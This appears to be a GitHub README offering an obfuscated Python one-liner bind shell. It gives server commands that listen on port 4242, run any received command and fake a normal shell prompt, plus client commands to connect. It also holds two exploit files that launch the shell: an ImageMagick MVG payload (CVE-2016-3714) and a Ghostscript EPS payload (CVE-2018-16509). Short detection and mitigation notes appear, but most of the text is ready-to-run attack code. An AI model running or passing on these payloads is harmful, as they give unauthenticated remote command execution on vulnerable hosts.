└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # Python one-liner bind shell 2 | ## The host command (to create a bind shell): 3 | ### Unix: 4 | This command and the Windows variant below bind a TCP listener on all interfaces (`0.0.0.0`) at port 4242, accept one connection, and pass each received line to `subprocess.check_output(..., shell=True)`. There is no authentication or transport encryption, so anything that can reach the port gets command execution as the invoking user. Detection: a `python -c` / `py -c` process whose command line contains `socket.socket` and `subprocess.check_output`, together with an unexpected listener on TCP 4242. 5 | ``` 6 | python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), 
__after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))" 7 | ``` 8 | 9 | ### Windows: 10 | 11 | ``` 12 | py -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. 
All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for 
__g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))" 13 | ``` 14 | 15 | 16 | 17 | ## The client command (to connect to the shell): 18 | ### Unix: 19 | #### Python 2: 20 | 21 | ``` 22 | python -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(raw_input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(raw_input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))" 23 | ``` 24 | 25 | #### Python 3: 26 | 27 | ``` 28 | python3 -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))" 29 | ``` 30 | 31 | 32 | ### Windows: 33 | #### Python2: 34 | 35 | ``` 36 | py -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(raw_input(d))]][0] for __g['d'] in 
[(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(raw_input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))" 37 | ``` 38 | 39 | #### Python 3: 40 | 41 | ``` 42 | py -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))" 43 | ``` 44 | 45 | 46 | ## Sample RCE payloads: 47 | ### CVE-2016-3714: 48 | CVE-2016-3714 ("ImageTragick") is ImageMagick's failure to filter shell metacharacters in values passed to delegate commands; in the MVG sample below, the backtick-quoted part of the `image over` URL is what the delegate's shell would run. Mitigation is a patched ImageMagick plus a `policy.xml` that sets `rights="none"` for the MVG, MSL, EPHEMERAL, URL and HTTPS coders, and checking file magic bytes before handing uploads to ImageMagick. 49 | ``` 50 | push graphic-context 51 | viewbox 0 0 640 480 52 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. 
All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for 
__g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))"`' 53 | pop graphic-context 54 | ``` 55 | 56 | ### CVE-2018-16509: 57 | CVE-2018-16509 is a Ghostscript `-dSAFER` sandbox bypass; in the sample below, the `%pipe%` prefix on the `/OutputFile` device parameter is what makes Ghostscript spawn the named command. Mitigation is a patched Ghostscript and, where ImageMagick or similar converters hand files to it, disabling the PS, EPS, PDF and XPS coders in `policy.xml`. 58 | ``` 59 | %!PS-Adobe-3.0 EPSF-3.0 60 | %%BoundingBox: -0 -0 100 100 61 | 62 | userdict /setpagedevice undef 63 | save 64 | legal 65 | { null restore } stopped { pop } if 66 | { legal } stopped { pop } if 67 | restore 68 | mark /OutputFile (%pipe%python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': 
lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))") currentdevice putdeviceprops 69 | ``` 70 | --------------------------------------------------------------------------------